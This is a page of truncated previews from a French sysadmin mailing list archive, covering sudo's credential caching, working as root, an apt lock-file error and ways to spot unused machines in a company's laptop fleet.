Il ne faut pas oublier dans ce cas que 'sudo' a une "latence" d'identification... Si tu tapes une commande 'sudo' et que tu pars en courant aux toilettes pour une "urgence", quelqu'un peut profiter de ta dernière commande pour relancer 'sudo' sans mot de passe. D. Le 22/04/2022 à 10:22, C.F

[FRsAG] Re: Fuck, l'outil improbable

Oui mais je fais tout sous root moi, j’ai découvert Unix sur SunOS vers 1991, y avait pas sudo :) > Le 19 avr. 2022 à 09:12, Romain a écrit : > > Pour sudo, y'a aussi le coup du : > > └─$ apt update > Reading package lists... Done > E: Could not open lock file /var/lib/apt/lists/lock - open (1

[FRsAG] Re: Gestion parc, identifier machines non utilisées

Hmm je pense que le problème c’est que dans notre cher pays, dans certains secteurs pas trop hi-tech, laptop = je vais ramener du boulot à la maison. Je l’ai vu/entendu de mes yeux, j’y croyais pas. SI c’est le problème, la solution est alors de les rassurer sur le fait que leur laptop va être a

[FRsAG] Re: Gestion parc, identifier machines non utilisées

teurs se déconnectent >> quand ils n'utilisent plus leur machine) >> la présence d'un ou plusieurs processes ou connexions entrantes ou >> d'utilisation CPU pour indiquer que la machine est utilisée, mais ça me >> paraît plus compliqué à définir >> B

  1   2   3   4   5   >